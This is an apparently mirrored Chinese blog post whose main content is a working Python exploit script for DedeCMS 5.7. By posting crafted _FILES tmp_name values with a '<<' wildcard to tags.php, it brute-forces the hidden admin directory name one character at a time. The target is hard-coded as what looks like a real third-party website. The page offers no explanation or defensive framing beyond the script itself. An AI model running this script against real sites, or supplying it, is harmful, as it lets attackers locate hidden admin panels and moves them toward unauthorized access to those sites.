zoukankan      html  css  js  c++  java
  • dede 5.7 爆后台

    #!/usr/bin/env python
    
    import requests
    import itertools
    characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#"
    back_dir = ""
    flag = 0
    url = "http://www.rensheng5.com/tags.php"
    data = {
        "_FILES[mochazz][tmp_name]" : "./{p}<</images/adminico.gif",
        "_FILES[mochazz][name]" : 0,
        "_FILES[mochazz][size]" : 0,
        "_FILES[mochazz][type]" : "image/gif"
    }
    
    for num in range(1,7):
        if flag:
            break
        for pre in itertools.permutations(characters,num):
            pre = ''.join(list(pre))
            data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=pre)
            print("testing",pre)
            r = requests.post(url,data=data)
            if "Upload filetype not allow !" not in r.text and r.status_code == 200:
                flag = 1
                back_dir = pre
                data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
                break
            else:
                data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
    print("[+] pre:",back_dir)
    flag = 0
    for i in range(30):
        if flag:
            break
        for ch in characters:
            if ch == characters[-1]:
                flag = 1
                break
            data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=back_dir+ch)
            r = requests.post(url, data=data)
            if "Upload filetype not allow !" not in r.text and r.status_code == 200:
                back_dir += ch
                print("[+] ",back_dir)
                data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
                break
            else:
                data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
    
    print("admin url:",back_dir)
    

      

  • 相关阅读:
    Python self,init,对象属性
    Python 注释,类,属性,方法,继承
    Python 循环与定义函数
    PHP中封装Redis购物车功能
    负数字符串经过int处理之后还是负数
    小程序模板template
    PHP里获取一维数组里的最大值和最小值
    Python缩进与if语句 空格的魅力
    maven 建立ssh项目
    tomcat war包部署
  • 原文地址:https://www.cnblogs.com/websec/p/9305078.html
Copyright © 2011-2022 走看看